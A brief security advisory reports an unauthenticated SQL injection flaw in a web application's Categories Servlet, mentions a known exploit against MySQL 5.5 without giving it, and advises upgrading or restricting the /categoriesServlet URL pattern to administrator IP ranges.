SQL injection via Categories Servlet - does not require authentication.  The only concrete exploit we have at this time is against mySQL 5.5.   Since this string does get passed to the DB for evaluation, it is possible that an exploit of this vulnerability may be possible on other database engines.  We recommend everyone upgrade or take the necessary precautions.

Restrict URL pattern /categoriesServlet to your administrator's IP range.